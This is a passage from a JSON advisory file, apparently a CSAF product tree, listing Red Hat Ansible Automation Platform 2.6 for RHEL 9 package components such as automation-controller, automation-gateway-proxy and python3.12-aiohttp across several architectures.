"name": "python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch"
},
"product_reference": "python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-tox-ansible-0:26.7.1-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src"
},
"product_reference": "python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src"
},
"product_reference": "receptor-0:1.6.7-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptorctl-0:1.6.7-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch"
},
"product_reference": "receptorctl-0:1.6.7-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src"
},
"product_reference": "receptor-0:1.6.7-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptorctl-0:1.6.7-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch"
},
"product_reference": "receptorctl-0:1.6.7-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.7.6-3.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64"
},
"product_reference": "aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le"
},
"product_reference": "aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.7.6-3.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x"
},
"product_reference": "aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.7.6-3.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src"
},
"product_reference": "aap-metrics-utility-0:0.7.6-3.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.7.6-3.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64"
},
"product_reference": "aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch"
},
"product_reference": "ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-dev-tools-0:26.7.2-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch"
},
"product_reference": "ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-dev-tools-0:26.7.2-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src"
},
"product_reference": "ansible-dev-tools-0:26.7.2-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.7.15-2.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64"
},
"product_reference": "automation-controller-0:4.7.15-2.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.7.15-2.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le"
},
"product_reference": "automation-controller-0:4.7.15-2.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.7.15-2.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x"
},
"product_reference": "automation-controller-0:4.7.15-2.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.7.15-2.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src"
},
"product_reference": "automation-controller-0:4.7.15-2.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.7.15-2.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64"
},
"product_reference": "automation-controller-0:4.7.15-2.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.7.15-2.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-server-0:4.7.15-2.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch"
},
"product_reference": "automation-controller-server-0:4.7.15-2.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-ui-0:4.7.15-2.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch"
},
"product_reference": "automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64"
},
"product_reference": "automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le"
},
"product_reference": "automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x"
},
"product_reference": "automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64"
},
"product_reference": "automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-eda-controller-0:1.2.11-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch"
},
"product_reference": "automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-eda-controller-0:1.2.11-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src"
},
"product_reference": "automation-eda-controller-0:1.2.11-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-eda-controller-base-0:1.2.11-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch"
},
"product_reference": "automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch"
},
"product_reference": "automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch"
},
"product_reference": "automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch"
},
"product_reference": "automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-0:2.6.20260804-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch"
},
"product_reference": "automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-0:2.6.20260804-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src"
},
"product_reference": "automation-gateway-0:2.6.20260804-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-config-0:2.6.20260804-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch"
},
"product_reference": "automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64"
},
"product_reference": "automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le"
},
"product_reference": "automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x"
},
"product_reference": "automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src"
},
"product_reference": "automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64"
},
"product_reference": "automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64"
},
"product_reference": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le"
},
"product_reference": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x"
},
"product_reference": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64"
},
"product_reference": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64"
},
"product_reference": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le"
},
"product_reference": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x"
},
"product_reference": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64"
},
"product_reference": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64"
},
"product_reference": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le"
},
"product_reference": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x"
},
"product_reference": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64"
},
"product_reference": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-server-0:2.6.20260804-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch"
},
"product_reference": "automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-hub-0:4.11.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch"
},
"product_reference": "automation-hub-0:4.11.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-hub-0:4.11.12-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src"
},
"product_reference": "automation-hub-0:4.11.12-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-platform-ui-0:2.6.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch"
},
"product_reference": "automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-platform-ui-0:2.6.12-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src"
},
"product_reference": "automation-platform-ui-0:2.6.12-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64"
},
"product_reference": "python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le"
},
"product_reference": "python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x"
},
"product_reference": "python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src"
},
"product_reference": "python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64"
},
"product_reference": "python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64"
},
"product_reference": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le"
},
"product_reference": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x"
},
"product_reference": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64"
},
"product_reference": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64"
},
